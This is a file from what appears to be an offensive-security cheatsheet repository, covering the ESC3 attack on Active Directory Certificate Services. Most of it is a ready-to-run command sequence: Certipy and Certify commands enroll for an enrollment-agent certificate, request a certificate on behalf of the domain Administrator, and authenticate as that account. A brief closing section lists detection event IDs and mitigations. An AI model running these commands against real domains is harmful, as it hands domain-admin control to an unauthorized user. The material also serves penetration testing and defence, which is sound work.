daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-29-esc3-certificate-request-agent.md (3775B)


      1 ---
      2 title: "Attack #29 โ€” ESC3 Certificate Request Agent"
      3 description: "ESC3 exploits the Certificate Request Agent (Enrollment Agent) EKU. A template with this EKU allows the enrolled user to request certificates on behalf ofโ€ฆ"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "privilege-escalation"]
      7 tools: ["Certipy", "Certify", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/๐ŸŸข Attack #29 โ€” ESC3 Certificate Request Agent.md"
     11 ---
     12 # ๐ŸŸข Attack #29 โ€” ESC3: Certificate Request Agent
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 ESC3 exploits the **Certificate Request Agent** (Enrollment Agent) EKU. A template with this EKU allows the enrolled user to **request certificates on behalf of other users**. If a low-privileged user can enroll for an Enrollment Agent certificate, they can then use it to request a Client Authentication certificate for any user in the domain โ€” including Domain Admins.
     19 
     20 ### Two-Step Attack
     21 
     22 ```
     23 1. Enroll for a certificate with "Certificate Request Agent" EKU (Template A)
     24 2. Use that certificate to request a Client Auth cert on behalf of Administrator (Template B)
     25 3. Authenticate as Administrator using the resulting certificate
     26 ```
     27 
     28 ***
     29 
     30 ## โš™๏ธ Prerequisites
     31 
     32 | Requirement | Detail |
     33 |---|---|
     34 | **Template with Certificate Request Agent EKU** | Low-priv users can enroll |
     35 | **Second template allowing enrollment-on-behalf-of** | Must allow agent-based enrollment |
     36 | **Manager approval not required** | On both templates |
     37 
     38 ***
     39 
     40 ## ๐Ÿ’ป Full Commands
     41 
     42 ```bash
     43 # โ”€โ”€ Enumerate โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     44 certipy find -u low_user@corp.local -p 'Password1' -dc-ip 10.10.10.10 -vulnerable -stdout
     45 # Look for: ESC3 โ€” Certificate Request Agent template
     46 
     47 # โ”€โ”€ Step 1: Get enrollment agent certificate โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     48 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     49   -template EnrollmentAgentTemplate -dc-ip 10.10.10.10
     50 
     51 # โ”€โ”€ Step 2: Request cert on behalf of Administrator โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     52 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     53   -template User -on-behalf-of 'corp\Administrator' \
     54   -pfx low_user.pfx -dc-ip 10.10.10.10
     55 
     56 # โ”€โ”€ Step 3: Authenticate โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     57 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
     58 ```
     59 
     60 ```powershell
     61 # โ”€โ”€ Certify โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     62 .\Certify.exe request /ca:CORP-CA /template:EnrollmentAgentTemplate
     63 # Convert to PFX, then use for on-behalf-of requests
     64 ```
     65 
     66 ***
     67 
     68 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     69 
     70 | Event ID | Source | What to Look For |
     71 |---|---|---|
     72 | **4886** | Security Log (CA) | Certificate enrollment โ€” watch for enrollment agent requests |
     73 | **4887** | Security Log (CA) | On-behalf-of requests from non-admin enrollment agents |
     74 
     75 ***
     76 
     77 ## ๐Ÿ”— Attack Chain Context
     78 
     79 ```
     80 [ESC3] โ”€โ”€โ†’ Enrollment Agent โ†’ request certs as any user
     81          โ”‚
     82          โ”œโ”€โ”€โ†’ ๐Ÿ”— Similar to ESC2 but with explicit Enrollment Agent EKU
     83          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: restrict enrollment agent templates, require approval
     84 ```
     85 
     86 ***
     87 
     88 > โœ… **Attack #29 โ€” ESC3 complete.**